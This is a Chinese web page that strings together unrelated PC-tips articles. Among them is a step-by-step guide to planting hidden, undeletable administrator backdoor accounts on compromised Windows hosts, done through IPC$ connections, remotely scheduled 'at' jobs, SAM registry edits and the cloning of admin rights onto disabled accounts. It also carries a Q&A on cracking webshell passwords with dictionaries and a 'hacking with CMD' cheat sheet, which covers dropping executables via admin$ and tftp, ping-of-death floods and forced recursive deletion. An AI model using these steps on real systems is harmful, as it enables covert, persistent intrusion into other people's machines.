如何导入黑客代码文件包（怎么装黑客代码）

生成了黑客字典文件后怎么用啊？？就是怎么把它导入需要输入密码的框？/

字典文件 是一个 密码 组合 。

生成的文件 当然 要导入到 你要破解的软件里面啊。

你可以简单 的 学习。。搜一下

用 溯雪 破 webshell 密码 吧。 简单 快捷 。。

你会很快 明白的。

教你制作“百毒不侵”的Windows系统

制作“百毒不侵”的Windows系统

在电脑配置并不高的机子上，不安装杀毒软件肯定效率要高得多。本人两年多不用杀毒软件也并没有病毒染身的原因。说白了就是以用户身份上网！而不是管理员身份。下面说一下怎么以用户方式上网。

1、安装系统后(包括Ghost XP)，首先把所有分区都转化成NTFS格式，很重要哦。不要说不会啊，就是单击开始按钮——运行。输入 “convert c: /fs:ntfs”，可以把C盘转换成NTFS格式，不过要重启才能转换哦，其它盘就把C改成相应的盘符就行了。

2、在控制面板中打开“用户帐号”，将Administrator修改密码，尽量复杂些，不一定要记得。再创建一个计算机管理员用户和受限用户，管理员用户一定要密码，且也要复杂一些，这个密码要记住。因为以后装软件，游戏要用上。当然，记不住可以在DOS下改。

3、设置好后，进入创建的计算机管理员用户，打开“我的电脑”，单击“工具”——“文件夹选项”，点击第二个选项卡“查看”，把里面的“使用简单文件共享(推荐)”前的勾去掉。这个是以后打开文件夹或文件的属性时会出现“安全”选项卡。

4、把所有分区属性的“安全”选项卡中“users”用户去掉。这是它默认有一个特殊权限，可以在分区下或文件夹内创建文件夹，再可以创建或保存文件，这可能给病毒可乘之机。所以去掉。还有一个是“everyone”。也去掉。添加创建的受限用户进去，权限是“只读”。

5、个别文件的权限问题：象QQ、游戏都需要完全权限，所以在计算机管理员用户中要给受限用户完全权限。QQ最好把与QQ程序在一起的文件给只读权限，防止木马替换QQ及相关的DLL文件。

6、在“运行”中输入“REGEDIT”，打开注册表，把里面的[HKEY_CURRENT_USER＼Software＼Microsoft＼Windows＼CurrentVersion＼Run]或[HKEY_CURRENT_USER＼Software＼Microsoft＼Windows＼CurrentVersion＼Runonce]的权限设为只读。防止病毒利用此处启动。

7、清理上网缓存及临时文件，上网时，一般缓存放在C:＼Documents and Settings＼用户名＼Local Settings＼Temporary Internet Files中，这也是病毒藏匿的地方，还有就是C:＼Documents and Settings＼用户名＼Local Settings＼Temp 下的临时文件。很多程序要用到这个地方。病毒也喜欢藏在这里，所以，在开机时，用批命令清空这两个文件夹。让病毒无处藏身。批命令为：

del C:＼docume~1＼用户名＼Locals~1＼Tempor~1＼*.*

del C:＼Docume~1＼用户名＼Locals~1＼Temp＼*.*

当然还可以把History和Cookies都清空。

做一个批命令文件，放到开始菜单中的“启动”项中。

这样也就做好了受限用户上网的准备工作，网上的病毒已经无法感染你的系统，也无法更改系统文件，对其它分区也无权更改，这样U盘病毒也无关紧要，因为病毒无法写入分区根目录下。网页病毒无法更改系统文件，再凶的网页病毒也无能为力了。

当然，此种方式对狂安装软件的人不适合，要想试用软件，如果不安装杀毒软件，最好利用虚拟机，象VMware和Virtual PC。对于只下音乐或电影的，没什么影响。

计算机软件升级实用技巧

随着计算机和网络技术日益普及，越来越多的家庭都拥有了电脑并且已经上网，为我们生活带来了无限便利和快乐。但是只要使用电脑――不管你是电脑的高手还是初学者，就离不开各类软件的应用。用最通俗的话来讲――没有软件的电脑根本无法使用。由于软件产品的特殊性又决定了，没有哪个厂家敢保证自己的软件产品是一步到位的，因此系统以及应用软件的升级就是大家在使用软件的过程中必然要遇到的问题。事实上，我们在使用计算机过程中也的确会遇到各种稀奇古怪的问题，这些问题有时并不都是使用操作不当造成，而是软件本身的缺陷所致。如果想让你的计算机运行的更加稳定、更加安全的话，在日常维护的时候可别忘记――软件升级。软件的升级主要包括两个方面：一个是操作系统得升级，另一个是操作系统下应用软件的升级。

一、 操作系统打补丁

1、升级就是打补丁

作为微软Windows操作系统家族成员中最先进的一个产品，微软Windows XP自出世以来就在中国市场中获得了广泛好评和客户的认同，它出色的兼容性和移动性也被业界所推崇。但是“金无足赤”、

任何一个软件产品都会有或多或少的毛病，何况是超乎寻常复杂的操作系统。Windows XP也是如此，照样存在着数以万计的系统漏洞。我们经常说的～给系统升级，实际上就是给系统打补丁，而补丁也主要是针对操作系统来量身定制的，如今的网络时代，在Internet上冲浪、与好友交流的时候，说不定就有人正在利用系统的漏洞让你无法上网，甚至侵入你的计算机盗取------对一些分区进行格式化操作！所以我们给微软打补丁有以下几个目的：

1） 增强系统安全性。这是最重要的，面对众多的黑客、病毒，微软公司接二连三地推出各种系统安全补丁，中心目的还是为了增强系统的安全性。而且无论你用计算机欣赏音乐、上网冲浪、运行游戏，还是编写文档都不可避免地需要涉及到补丁程序。

2） 提高系统可靠性和兼容性。补丁中有很多可以提高你的硬件性能，还可以使你的系统更加稳定。

3） 实现更多的功能。补丁中有很多使用的小软件，这些都是微软所推荐用户添加的，多了它们没有什么坏处。

2、怎样让系统打上补丁

朋友们对Service Pack（简写为SP）一定不会陌生吧！它就是微软每隔一段时间就要推出的补丁包的集合软件。微软的操作系统及软件产品漏洞很多，微软不得不频繁地发布各种Hotfix（通常称为修补程序）来进行修补，但对一般用户来说，要查看自己的电脑是否安装了某个Hotfix是一件麻烦事，下载安装各种Hotfix也很繁琐，微软为了解决问题，就开始发布SP补丁包，SP补丁包中包含有SP发布日期前所发布的所有Hotfix。也就是说，Hotfix是针对某一个问题的单一补丁，SP包含SP发布日期前的所有Hotfix补丁。因此，只要你下载并安装了SP补丁包，就不需要再去下载安装SP发布日期前的Hotfix了。SP补丁包按发布日期的先后顺序排列，这样便有了SP1、SP2、SP3……等等。

针对Windows操作系统的SP补丁包是可叠加补丁包，也就是说SP2中已包含有SP1中的所有补丁，SP3中已包含有SP2、SP1中的所有补丁，以此类推，如Windows 2000现在就有SP1、SP2、SP3、SP4补丁包。不过，Office产品的SP补丁包是不可叠加补丁包，比如SP2只包含有SP1发布日期以后到SP2发布日期前这一段时间内的所有补丁，以此类推。因此，对于Windows产品来说，用户只需下载并安装最新的SP补丁包即可。而对于Office产品则必须下载并安装所有的SP补丁包，这一点务必要注意。

怎样重新安装Windows

1、执行病毒和恶意软件扫描您的计算机上，然后重新安装Windows。虽然重新安装过程将覆盖任何受感染的系统文件，可以感染其他计算机上的文件。运行扫描，再重新安装，以消除感染或删除受感染的文件，使他们无法再次感染你的系统重新安装后，你已经完成了。当扫描完成后，关闭您的杀毒软件，然后再开始重新安装，并把它关闭，直到过程完成后。

2、通过将数据复制到闪存驱动器，外部硬盘驱动器或内部硬盘驱动器是分开的，从你的Windows分区的分区，让您的文档，图片和其他重要数据的备份副本。如果这些选项不可用，使用可移动介质，如可写DVD光盘，备份您的文件。其他软件，你会重新找到你的Windows产品密钥，产品密钥，应包含安装光盘或Windows键，如果它来连接到您的计算机上安装的Windows。写下详细信息，如您的用户名，计算机名和工作组名称，确保它们输入正确完成重新安装后。

3、确定你希望怎样重新安装Windows。给你两个选项可供选择：一个完整??的重新安装，使用“自定义安装选项或“就地升级重新安装使用“升级安装选项。一个完整的重新安装，让您选择驱动器分区格式化，再重新安装，虽然是在不需要格式化。在就地重新安装覆盖系统文件，以同样的方式，升级到另一个版本的Windows将不重新格式化驱动器。如果您决定要格式化的驱动器，你会选择之间的全格式安全地删除所有的分区信息，并快速格式化，覆盖以前的数据。全格式可确保所有以前的数据完??全删除，但它需要更长的时间比一个不太安全的快速格式。

4、卸载任何Service;Pack更新您之前已经安装，如果您不打算格式化Windows分区。这是通过点击“查看已安装的更新链接，在“卸载程序窗口，选择你想删除的Service;Pack更新，点击“卸载按钮。Windows可能无法正确??重新开始安装过程之前，因为软件会看到重新安装过程中，未经授权的降级不会被删除，如果服务包更新。

重新安装

5、将Windows安装光盘插入到您的计算机的DVD驱动器。如果你想执行“就地升级重新安装，从光盘运行“setup.exe文件，在Windows运行时。如果您打算进行完全重新安装，重新启动计算机，并出现提示时，按任意键从DVD驱动器中的光盘启动。

Windows 7从“库”中快速筛选文件

Windows7的“库”不仅可以将某一类文件夹集中在一起，其实，文件库一个更强大的应用是将这些文件夹中的包含某一个关键字的文件都找出来，并“集中”管理。

1.找出包含某一关键字的全部文件

打开任意一个文件夹，从导航栏里找到“库”，单击其下的'子文件库，在搜索栏里输入关键字（例如“摩擦力”）并按回车，很快，与这一关键词相关的文件将会全部找出来。

由于Win 7的搜索功能默认会将文件库当中的文件纳入到索引中，因此文件库当中的搜索既会按文件名进行，又会按文件内容进行。搜索完毕后单击“保存搜索”，名为“摩擦力”的搜索结果将保存下来。今后，只要双击保存过的搜索结果，即可将该搜索结果当中的文件全部找出来，而不需要再次搜索，可谓一劳永逸。

2.增加筛选条件，显示特定文件

根据上面的介绍，只要包含搜索关键字的文档都会被罗列出来，那么我们如何查看某一类特定的文件呢？其实只要在前面的搜索基础上加入这一筛选条件即可。

双击前面保存过的搜索结果，在排序按钮一栏中找到“类型”，勾选其下的“Microsoft Office Word 97 – 2003文件”，这样就只有Word文档才会显示出来。这里的类型选项，Win 7会自动识别搜索结果当中所包含的所有文件的类型，因此，只需要通过选择就可以轻松实现查看该搜索结果当中某一特定类型的文件。

此外，我们还可以根据其他条件来进行筛选。比如对于照片文件，可添加光圈、快门等筛选条件；对邮件，可按发件人、收件人进行筛选。如果筛选按钮中没有出现你所需的条件，还可以右击排序按钮再选择“其它”来添加。

Win 7的文件库可以帮助我们更好地管理电脑中的文件，通过文件库搜索，可以将分散的文档集中在一起，对于文件的管理也更加一目了然，而通过不同条件的筛选，则可以进一步实现无用信息的快速过滤。可以说Win 7的文件库为我们提供了一种新的文件管理方式，如果你是一个不太有条理的人，那么文件库就是你一定要好好地用上一用的了！

在Vista中选择多个文件如此简单

相信你肯定知道在Windows下面选择多个文件时用Shift或是Ctrl键的方法。而在Vista的“文件夹和搜索选项-“查看中为你提供了一种新方法---“使用复选框选择文件。

开启复选框，快速选择多个文件

如果点选了这个选项，在你将鼠标划过文件时会看到文档旁边出现了一个复选框。分别点选这些复选框你就可以将多个文件选中，进行多文件操作了。

Windows 7中快速复制和移动文件夹

不知道大家没有注意到，在Windows 7资源管理器的“编辑”菜单下多了“复制到文件夹”和“移动到文件夹”两个功能。利用这两个功能项我们可以方便地将一个或者多个文件，以及一个或多个文件夹快速地复制或者移动到目标位置。不过，默认情况下Windows 7的资源管理器是不显示菜单栏的。我们可以按下键盘的ALT键或者调整文件夹选项，以使菜单栏始终显示。这样，当我们要将某文件或者文件夹复制或者移动到目标文件夹时，只需选中源文件或文件夹(一个或多个)，然后执行“编辑”→“复制到文件夹”(“移动到文件夹”)，此时会弹出对话框，我们只需定位到目标地址即可。

当然，我们还可采取更加便捷的方法，就像“复制”、“粘贴”那样将这两个功能集成到右键菜单中，随时调用。其实，“复制到文件夹”和“移动到文件夹”在系统中都有其对应的32为标识符。其中，“复制到文件夹”所对于的标识符是“{C2FBB630-2971-11D1-A18C-00C04FD75D13}”，其默认值是“Microsoft Copy To Service”;而“移动到文件夹”所对于的标识符是“{C2FBB631-2971-11D1-A18C-00C04FD75D13}”，其默认值是“Microsoft Move To Service”。我们打开“注册表编辑器”(regedit.exe)，定位到注册表[HKEY_CLASSES_ROOTAllFilesystemObjectsshellexContextMenuHandlers]项下，然后在其下创建“{C2FBB630-2971-11D1-A18C-00C04FD75D13}”和“{C2FBB631-2971-11D1-A18C-00C04FD75D13}”项。这样，我们就可以通过右键菜单调用这两个功能了。如果大家觉得添加注册表项比较麻烦，可将下面的代码保存为Add.reg，然后直接双击导入注册表。

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOTAllFilesystemObjectsshellexContextMenuHandlers]

[HKEY_CLASSES_ROOTAllFilesystemObjectsshellexContextMenuHandlers{C2FBB630-2971-11D1-A18C-00C04FD75D13}]

[HKEY_CLASSES_ROOTAllFilesystemObjectsshellexContextMenuHandlers{C2FBB631-2971-11D1-A18C-00C04FD75D13}]

电脑高手请进

Win XP中建立隐藏用户的多种方法

一、如何在图形界面建立隐藏的超级用户

图形界面下适用本地或开3389终端服务的肉鸡上。上面我提到的那位作者说的方法很好，但是较为复杂，还要用到psu.exe(让程序以系统用户身份运行的程序)，如果在肉鸡上的话还要上传psu.exe。我说的这个方法将不用到psu.exe这个程序。因为windows2000有两个注册表编辑器:regedit.exe和regedt32.exe。XP中regedit.exe和regedt32.exe实为一个程序，修改键值的权限时在右键中点“权限”来修改。对regedit.exe我想大家都很熟悉，但却不能对注册表的项键设置权限，而regedt32.exe最大的优点就是能够对注册表的项键设置权限。nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINESAMSAM键下，但是除了系统用户SYSTEM外，其它用户都无权查看到里面的信息，因此我首先用regedt32.exe对SAM键为我设置为“完全控制”权限。这样就可以对SAM键内的信息进行读写了了。具体步聚如下:

1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的，首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户 字串7

net user hacker$ 1234 /add

2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。

3、点“权限”以后会弹出窗口

点添加将我登录时的帐户添加到安全栏内，这里我是以administrator的身份登录的，所以我就将administrator加入，并设置权限为“完全控制"。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组，切莫修改原有的帐户或组，否则将会带来一系列不必要的问题。等隐藏超级用户建好以，再来这里将你添加的帐户删除即可。

4、再点“开始”→“运行”并输入"regedit.exe" 回车,启动注册表编辑器regedit.exe。

打开键:HKEY_LOCAL_MAICHINESAMSAMDomainsaccountusernameshacker$"

5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg，用记事本分别打这几个导出的文件进行编辑，将超级用户对应的项000001F4下的键"F"的值复制，并覆盖hacker$对应的项00000409下的键"F"的值,然后再将00000409.reg与hacker.reg合并。

6、在命令行下执行net user hacker$ /del将用户hacker$删除:net user hacker$ /del

7、在regedit.exe的窗口内按F5刷新，然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可

字串6

8、到此，隐藏的超级用户hacker$已经建好了，然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINESAMSAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。

9、注意:隐藏的超级用户建好后，在帐户管理器看不到hacker$这个用户，在命令行用“net user”命令也看不到，但是超级用户建立以后，就不能再改密码了，如果用net user命令来改hacker$的密码的话，那么在帐户管理器中将又会看这个隐藏的超级用户了，而且不能删除。

二、如何在命令行下远程建立隐藏的超级用户

在这里将用at的命令，因为用at产生的计划任务是以系统身份运行的，所以也用不到psu.exe程序。为了能够使用at命令，肉鸡必须开有schedule的服务，如果没有开启，可用流光里带的工具netsvc.exe或sc.exe来远程启动，当然其方法也可以，只要能启动schedule服务就行。

对于命令行方式，你可以采用各种连接方式，如用SQLexec连接MSSQL的1433端口，也可以用telnet服务，只要以你能得到一个cmdshell，并且有运行at命令的权限就可以。

字串9

1、首先找到一台肉鸡，至于如何来找那不是我这里所说的话题。这里先假设找到一台超级用户为administrator,密码为12345678的肉鸡，现在我们开始在命令行下远程为它建立隐藏的超级用户。(例子中的主机是我的局域网内的一台主机，我将它的ip地址改为13.50.97.238,，请勿在互联网上对号入座,以免骚扰正常的ip地址。)

2、先与肉鸡建立连接,命令为: net use 13.50.97.238ipc$ "12345678" /user:"administrator

3、用at命令在肉鸡上建立一个用户(如果at服务没有启动，可用小榕的netsvc.exe或sc.exe来远程启动):at 13.50.97.238 12:51

c:winntsystem32net.exe user hacker$ 1234 /add

建立这个加有$符的用户名，是因为加有$符后，命令行下用net user将不显示这个用户，但在帐户管理器却能看到这个用户。

4、同样用at命令导出HKEY_LOCAL_MACHINEsamsamDomainsaccountusers下键值:at 13.50.97.238 12:55

c:winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers

/e 是regedit.exe的参数，在_LOCAL_MACHINESAMSAMDomainsaccountusers这个键的一定要以结尾。必要的情况下可以用引号将"c:winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers"引起来。

字串2

5、将肉鸡上的hacker.reg下载到本机上用记事本打开进行编辑命令为:copy 13.50.97.238admin$system32hacker.reg

c:hacker.reg

修改的方法图形界中已经介绍过了，这里就不作介绍了。

6、再将编辑好的hacker.reg拷回肉鸡上 copy c:hacker.reg 13.50.97.238admin$system32hacker1.reg

7、查看肉鸡时间:net time 13.50.97.238 然后用at命令将用户hacker$删除:

at 13.50.97.238 13:40 net user hacker$ /del

8、验证hacker$是否删除:用

net use 13.50.97.238 /del 断开与肉鸡的连接。

net use 13.50.97.238ipc$ "1234" /user:"hacker$" 用帐户hacker$与肉鸡连接，不能连接说明已删除。

9、再与肉鸡建立连接:net use 13.50.97.238ipc$ "12345678" /user:"administrator"

再取得肉鸡时间，用at命令将拷回肉鸡的hacker1.reg导入肉鸡注册表:

at 13.50.97.238 13:41 c:winntregedit.exe /s hacker1.reg

regedit.exe的参数/s是指安静模式。

10、再验证hacker$是否已建立，方法同上面验证hacker$是否被删除一样。

字串1

11、再验证用户hacker$是否有读、写、删的权限，如果不放心，你还可验证是否能建立其它帐户。

12、通过11可以断定用户hacker$具有超级用户权限，因为最初我用at命令建立它的时候是一个普通用户，而现在却具有远程读、写、删的权限。

三、如果肉鸡没有开3389终端服务，而我又不想用命令行，怎么办?

这种情况下，你也可以用界面方式来远程为肉鸡建立隐藏的超级用户。因为regedit.exe、regedt32.exe都有连接网络注册表的功能，你可以用regedt32.exe来为远程主机的注册表项设置权限，用regedit.exe来编辑远程注册表。帐户管理器也有一项连另一台计算机的功能，你可以用帐户管理器为远程主机建立和删除帐户。具体步聚与上面介绍的相似，我就不多说了，只它的速度实在是令人难以忍受。

但是这里有两个前提:1、先用net use 肉鸡ipipc$ "密码" /user:"超级用户名"来与远程主机建立连接以后，才能用regedit.exe regedt32.exe及帐户管理器与远程主机连接。

2、远程主机必须开启远程注册表服务(没有开启的话，你也可以远程开启，因为你有超级用户的密码了)。 字串1

四、利用被禁用的帐户建立隐藏的超级用户:我们可以用肉鸡上被禁止的用户来建立隐藏的超组用户.方法如下:

1.想办法查看有哪些用户被细心的管理员禁止，一般情况下，有些管理员出于安全考虑，通常会将guest禁用，当然了会禁用其它用户。在图形界面下，非常容易，只要在帐户管理器中就可以看到被禁用的帐户上有一个红叉;而在命令行下，我还没有想到好的办法，只能在命令行下用命令:"net user 用户名"一个一个来查看用户是否被禁用。

2.在这里，我们假设用户hacker被管理员禁用。首先，我先用小榕的超组用户克隆程序CA.exe，将被禁用的用户hacker 克隆成超级用户(克隆之后，被禁用的用户hacker就会自动被激活了): CA.EXE 肉鸡ip Administrator 超级用户密码 hacher hacher密码。

3.如果你现在一个cmdshell，如利用telnet服务或SQLEXEC连接肉鸡的msSQL的默认端口1433得到的shell都可以，这时你只要输入命令:

net user hacker /active:no 这样用户hacker就被禁用了(至少表面上是这样的)，当然你也可以将用户hacher换成其它的被禁用的用户。

4.这时如果你在图形界面下看帐户管理器中的用户时,会发现用户hacker被禁用了，但事实上是这样的吗?你用这个被禁用的用户连接一下肉鸡看看是否能连上?用命令:net user 肉鸡ipipc$ "hacker密码" /user:"hacker" 连一连看看。我可以告诉大家，经过我多次试验，次次都能成功，而且还是超级用户权限。

字串8

5.如果没有cmdshell怎么办?你可以我上面介绍的at命令来禁用用户hacker;命令格式:at 肉鸡ip 时间 net user hacker /active:no

6.原理:具体的高深的原理我也说不上来，我只能从最简单的说。你先在图形界面下在帐户管理器中禁用一下超级用户administrator看看，肯定会弹出一对话框，并禁止你继续禁用超级用户administrator，同样，因为在克隆时，hacker在注册表的"F"键被超级用户administrator在注册表的"F"键所替代，因而hacker就具有了超级用户的权限了，但是由于hacker在注册表内"C"健还是原来的"C"键，所以hacker还是会被禁用，但是它的超级用户权限却不会被禁用，因此被禁用的用户hacker还是可以连接肉鸡，而且还具有超级用户的权限。具体我也说不明白，大家权且这么理解吧。

五、注意的几点事项:

1、隐藏的超级用户建立以后，在帐户管理器中和命令行下均看不到这个用户，但这个用户却存在。

2、隐藏的超级用户建立以后，就不能再修改密码了，因为一旦修改密码，这个隐藏的超级用户就会暴露在帐户管理器中，而且不能删除。

3、如在本机上试验时，最好用系统自带的备份工具先备份好本机的“系统状态”主要是注册表的备份，因为本人做试验时，曾出现过帐户管理器中看不到任何用户，组中也看不到任何组的现象，但它们却存在。幸好我有备份,呵呵。SAM键是毕竟系统最敏感的部位。

字串2

4、本方法在2000/XP上测试通过，未在NT上测试。

注：本方法仅供研究，请勿将本方法用于破坏上，利用本方法造成严重后果者，由使用者负责，本人概不负责。

如何生成黑客字典文件，需要什么工具？

找个专门的破解的工具，然后将字典导进工具，用工具去比对密码。 诶、字典文件 是一个 密码 组合 。 生成的文件 当然 要导入到 你要破解的软件

怎样利用“CMD”进行黑客入侵？

net use ipipc$ " " /user:" " 建立IPC空链接

net use ipipc$ "密码" /user:"用户名" 建立IPC非空链接

net use h: ipc$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:

net use h: ipc$ 登陆后映射对方C：到本地为H:

net use ipipc$ /del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名　密码　/add 建立用户

net user guest /active:yes 激活guest用户

net user 查看有哪些用户

net user 帐户名 查看帐户的属性

net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数

net start 查看开启了哪些服务

net start 服务名　 开启服务；(如:net start telnet， net start schedule)

net stop 服务名 停止某服务

net time 目标ip 查看对方时间

net time 目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view ip 查看对方局域网内开启了哪些共享

net config 显示系统网络设置

net logoff 断开连接的共享

net pause 服务名 暂停某服务

net send ip "文本信息" 向对方发信息

net ver 局域网内正在使用的网络连接类型和信息

net share 查看本地开启的共享

net share ipc$ 开启ipc$共享

net share ipc$ /del 删除ipc$共享

net share c$ /del 删除C：共享

net user guest 12345 用guest用户登陆后用将密码改为12345

net password 密码 更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的网络连接情况，常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）

netstat -s 查看正在使用的所有协议使用情况

nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写

tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。

ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

二：

del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）

move 盘符路径要移动的文件名　存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖

fc one.txt two.txt 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，" "和" " 是重定向命令

at id号 开启已注册的某个计划任务

at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止

at id号 /delete 停止某个已注册的计划任务

at 查看所有的计划任务

at ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机

finger username @host 查看最近有哪些用户登陆

telnet ip 端口 远和登陆服务器,默认端口为23

open ip 连接到IP（属telnet登陆后的命令）

telnet 在本机上直接键入telnet 将进入本机的telnet

copy 路径文件名1　路径文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件

copy c:srv.exe ipadmin$ 复制本地c:srv.exe到对方的admin下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件

copy ipadmin$svv.exe c: 或:copyipadmin$*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：

xcopy 要复制的文件或目录树　目标地址目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件

tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:server.exe 登陆后，将“IP”的server.exe下载到目标主机c:server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送

tftp -i 对方IP　put c:server.exe 登陆后，上传本地c:server.exe至主机

ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)

route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface

arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息

start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令

mem 查看cpu使用情况

attrib 文件名(目录名) 查看某文件（目录）的属性

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性

dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间

date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间

set 指定环境变量名称=要指派给变量的字符 设置环境变量

set 显示当前所有的环境变量

set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量

pause 暂停批处理程序，并显示出：请按任意键继续....

if 在批处理程序中执行条件处理（更多说明见if命令及变量）

goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）

call 路径批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）

for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）

echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置

echo 信息 在屏幕上显示出信息

echo 信息 pass.txt 将"信息"保存到pass.txt文件中

findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello

find 文件名 查找某文件

title 标题名字 更改CMD窗口标题名字

color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白

prompt 名称 更改cmd.exe的显示的命令提示符(把C:、D:统一改为：EntSky )

三：

ver 在DOS窗口下显示版本信息

winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）

format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：format D: /FS:NTFS

md　目录名 创建目录

replace 源文件　要替换文件的目录 替换文件

ren 原文件名　新文件名 重命名文件名

tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称

type 文件名 显示文本文件的内容

more 文件名 逐屏显示输出文件

doskey 要锁定的命令＝字符

doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=

taskmgr 调出任务管理器

chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误

tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口

exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe

path 路径可执行文件的文件名 为可执行文件设置一个路径。

cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?

regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；

regedit /e 注册表文件名 导出注册表

cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D: est.txt /D pub 设定d: est.txt拒绝pub用户访问。

cacls 文件名 查看文件的访问用户权限列表

REM 文本内容 在批处理文件中添加注解

netsh 查看或更改本地网络配置情况

四：

IIS服务命令：

iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）

iisreset /start或stop 启动（停止）所有Internet服务

iisreset /restart 停止然后重新启动所有Internet服务

iisreset /status 显示所有Internet服务状态

iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动

iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机

iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务

iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。

FTP 命令： (后面有详细说明内容)

ftp的命令行格式为:

ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。

－d 使用调试方式。
